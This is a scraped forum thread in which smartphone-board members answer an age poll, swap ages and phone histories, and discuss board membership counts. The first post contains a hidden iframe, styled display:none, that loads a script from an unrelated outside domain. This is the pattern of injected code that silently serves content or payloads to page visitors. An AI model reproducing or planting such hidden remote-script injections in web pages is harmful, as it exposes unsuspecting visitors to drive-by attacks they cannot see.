Poll: What age group do you fit into?

+ Reply to Thread

Groups Demographics

OK, there has been a debate about the adoption of technology of the generations. So, I am interested in the demographics of this group. Let's see what the age breakdown of this group is. For the record, I am 43.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Carl

Thank You!

Ahhhh! One more chance to mark the 30-34 age bracket before I turn 35 in August! Thanks!

An additional bit of info that would be interesting: male/female?

(I am a female ... dying to get my hands on the I500!)
    Nicky

Maybe male/female thing is a different poll. While the pool allows you to select multiple answers (if it is set up to allow that), I beleive it would mess up how the percentages.
    Carl

Indeed. It would be rather interesting to see the percentage of female vs. male.

I myself am male, and as I've stated before, am 27.

PHO
    Broward County Florida, "Home of the Hanging Chad"
    who actually rates threads, i have never done it, except just now to see hwo it works with the web demo thread. But who rated this thread a 1?

More Posts, Cmon Peoples Chim in, don't forget to hit the age post. This is intersting, especially in light of all the debate.
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

PHO
    on this whole subject of demographics, in our little fratnerity here. I have some random information.

Our board, which is mostly Sprint types covering 300/330/500/700 ect ect. has approximatly 2100 registered users. I dont' know what the daily traffic or posting is, and i don't know where the spike's occur in registration and posting but i would be curious to know (mjorange, marc)

the 7135 board, covers mostly verizon, but is 7135/ 6035 phones, has approximatly 4190 users. I'm very interested to see the traffic stats over there too. to compare.

if you haven't been to the 7135 bord, you should see it. www.smartphonesource.com

the daily posts there are, well, there is a ton.

These numbers with registered users hits many people that don't use the board, but it doesn't capture the lurkers which i am sure there are a bunch of as well.

Oh, i am all for contributing to do the smiley/ avitar upgrade, did someone buy this board?
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

Nanotechnology Nerd shadowboxer's Avatar

Talking Old Farts abound

HA!!

Us old farts ( over 30 crowd ) outnumber you under 30 smarta#$ whippersnappers 27 to 15. Whadda you think of those apples?

Hey I'm 42, I need my i-500 SOON before my arthur-itis gets too bad.

-dale
    dale1
    my story in phones....
    i300-->i330-->i500-->sprintt650-->ppc6700-->gsmt650-->HTC Universal-->gsmt650-->8525-->back again to my trusty t650

PHO

Re: Old Farts abound

Originally posted by shadowboxer
    HA!!

Us old farts ( over 30 crowd ) outnumber you under 30 smarta#$ whippersnappers 27 to 15. Whadda you think of those apples?

Hey I'm 42, I need my i-500 SOON before my arthur-itis gets too bad.

-dale
    Looks to me so far that 60% of the people on this board are in the 25-40 range, which is what my original out of my ass guess was.

You know what is also interesting on the 7135 board, there is a "calender" feature. if you put your birthday in when you registered you come up on the calender, AND how old you are.

Now, i can't tell you if this is evidence of age distribution that own the phone, or at what age you are willing to put your birthdate on a signup sheet for a website

but, its interesting non the less

www.grtalk.com

Whew, one more chance to mark a box under 39...

Just for balance, I've asked my young girlfriend to vote on the age and gender polls...